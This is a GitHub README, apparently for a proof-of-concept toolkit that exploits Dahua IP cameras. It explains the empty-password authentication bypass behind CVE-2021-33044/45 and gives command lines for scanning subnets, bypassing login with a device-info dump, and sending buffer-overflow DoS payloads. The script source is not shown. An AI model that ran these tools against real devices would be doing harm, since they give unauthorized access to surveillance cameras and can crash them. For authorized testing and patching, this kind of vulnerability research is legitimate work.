umair-aziz025/dahua-cve-research

GitHub: umair-aziz025/dahua-cve-research

大华 IP 摄像头多 CVE 漏洞研究工具集,集成网络发现、认证绕过和缓冲区溢出验证功能。

Stars: 2 | Forks: 0

# 大华 IP 摄像头 CVE 漏洞利用工具 针对四个大华 IP 摄像头关键漏洞的研究和概念验证脚本。 ## ⚠️ 法律免责声明 ``` THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY. By using these tools, you agree that: 1. You have EXPLICIT WRITTEN AUTHORIZATION to test the target systems 2. You will NOT use these tools for illegal activities 3. You accept full responsibility for your actions 4. The authors are NOT liable for any misuse or damage Unauthorized access to computer systems is a CRIMINAL OFFENSE in most jurisdictions. ``` ## 涵盖的 CVE | CVE | CVSS | 类型 | 状态 | |-----|------|------|--------| | **CVE-2021-33044** | 9.8 CRITICAL | 认证绕过 | CISA KEV (已被积极利用) | | **CVE-2021-33045** | 9.8 CRITICAL | 认证绕过 | CISA KEV (已被积极利用) | | **CVE-2025-31700** | 8.1 HIGH | 缓冲区溢出 DoS | 近期 (2025) | | **CVE-2025-31701** | 8.1 HIGH | 缓冲区溢出 DoS | 近期 (2025) | ### CVE-2021-33044 & CVE-2021-33045 — 认证绕过 - **CVSS:** 9.8 CRITICAL - **CWE:** CWE-287 (认证不当) - **机制:** RPC2 登录接受空密码哈希,从而授予管理员访问权限 - **受影响设备:** IPC-HUM7xxx, IPC-HX3xxx/HX5xxx, TPC-*, VTO-*, VTH-*, NVR-*, XVR-* - **修复版本:** 固件 2.820.x+ (IPC) / 4.001.x+ (NVR/XVR) - **参考:** - [NVD CVE-2021-33044](https://nvd.nist.gov/vuln/detail/CVE-2021-33044) - [NVD CVE-2021-33045](https://nvd.nist.gov/vuln/detail/CVE-2021-33045) - [CISA KEV 目录](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) ### CVE-2025-31700 & CVE-2025-31701 — 缓冲区溢出 (DoS/RCE) - **CVSS:** 8.1 HIGH - **CWE:** CWE-120 (未检查输入大小的缓冲区复制) - **机制:** 超大数据包导致缓冲区溢出 → 崩溃或潜在的 RCE - **参考:** - [NVD CVE-2025-31700](https://nvd.nist.gov/vuln/detail/CVE-2025-31700) - [大华安全公告](https://dahuasecurity.com/aboutUs/trustedCenter/details/775) ## 认证绕过原理 大华摄像头通过 `/RPC2_Login` 使用挑战-响应认证: ``` Normal Login: step1 = MD5("admin:realm:PASSWORD") step2 = MD5("step1:random:step1") Bypass (CVE-2021-33044/45): step1 = MD5("admin:realm:") ← EMPTY password step2 = MD5("step1:random:step1") ``` 存在漏洞的固件接受空密码哈希并返回有效的会话 token。 ## 脚本 | 文件 | 用途 | CVEs | |------|---------|------| | `dahua_scanner.py` | 网络发现 — 在子网中查找大华摄像头 | 检测 | | `dahua_exploit.py` | 多 CVE 扫描器 — 测试所有漏洞 | 全部 | | `dahua_auth_bypass.py` | 专用认证绕过工具,支持 `--dump` 选项 | CVE-2021-33044/45 | | `dahua_rce.py` | 缓冲区溢出 DoS 探测 | CVE-2025-31700/01 | ## 安装 ``` # Clone repository git clone https://github.com/umair-aziz025/Dahua_IP_Camera_CVE_Exploit.git cd Dahua_IP_Camera_CVE_Exploit # Install dependencies pip install requests ``` ## 使用方法 ### 网络扫描器 ``` # Scan subnet (ports required) python dahua_scanner.py 192.168.1.0/24 -p 80 8080 8081 # Single host with port python dahua_scanner.py 192.168.1.100:8081 # Full options python dahua_scanner.py 192.168.1.0/24 -p 80 8080 -w 100 -t 10 -v -o results.json # Show help python dahua_scanner.py --help ``` 常见大华端口:`80, 8000, 8080, 8081, 8888, 9000, 443, 37777` ### 多 CVE 漏洞利用 (推荐) ``` python dahua_exploit.py 192.168.1.100 -p 8081 python dahua_exploit.py 192.168.1.100 -c 2021-33044 # Single CVE python dahua_exploit.py --help ``` ### 认证绕过 ``` python dahua_auth_bypass.py 192.168.1.100 -p 8081 python dahua_auth_bypass.py 192.168.1.100 --dump # Dump device info after bypass ``` ### 缓冲区溢出 DoS ``` python dahua_rce.py 192.168.1.100 -p 8081 python dahua_rce.py 192.168.1.100 --cve http # HTTP only python dahua_rce.py 192.168.1.100 --cve tcp # TCP/37777 only ``` ⚠️ **警告:** DoS 脚本可能会导致目标设备崩溃。 ## 依赖项 ``` requests ``` 所有其他导入均来自 Python 标准库: `socket`, `struct`, `hashlib`, `threading`, `ipaddress`, `argparse`, `json` ## 开发状态 🚧 **正在积极开发中** 这些脚本是基于以下内容开发的: - NVD 发布的 CVE 详情 - 大华安全公告 - 公开的 PoC 参考资料 (seclists.org, packetstormsecurity) **测试状态:** - ✅ 已根据 CVE 规范实现认证绕过逻辑 - ✅ 已根据公告构建缓冲区溢出 payload - ⚠️ 针对真实受漏洞影响设备的测试有限 - ⚠️ 需要针对不同固件版本进行额外的验证 如果您有受漏洞影响的设备可用于测试,欢迎贡献和反馈。 ## 参考资料 - [NVD - CVE-2021-33044](https://nvd.nist.gov/vuln/detail/CVE-2021-33044) - [NVD - CVE-2021-33045](https://nvd.nist.gov/vuln/detail/CVE-2021-33045) - [NVD - CVE-2025-31700](https://nvd.nist.gov/vuln/detail/CVE-2025-31700) - [NVD - CVE-2025-31701](https://nvd.nist.gov/vuln/detail/CVE-2025-31701) - [CISA 已知被利用漏洞目录](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) - [大华安全中心](https://dahuasecurity.com/aboutUs/trustedCenter/details/775) - [Bashis PoC - Seclists](http://seclists.org/fulldisclosure/2021/Oct/13) ## 许可证 MIT 许可证 - 详见 [LICENSE](LICENSE) 文件。 ## 作者 **Umair Aziz** GitHub: [@umair-aziz025](https://github.com/umair-aziz025) *仅供教育和授权安全研究使用。*
标签:CISA KEV, CISA项目, CVE, CVE-2021-33044, CVE-2021-33045, CVE-2025-31700, CVE-2025-31701, EXP, IoT安全, IP摄像头, POC, RCE, Web报告查看器, 固件漏洞, 大华, 拒绝服务攻击, 摄像头安全, 数字签名, 智能安防, 缓冲区溢出, 网络安全, 身份验证绕过, 逆向工具, 配置错误, 隐私保护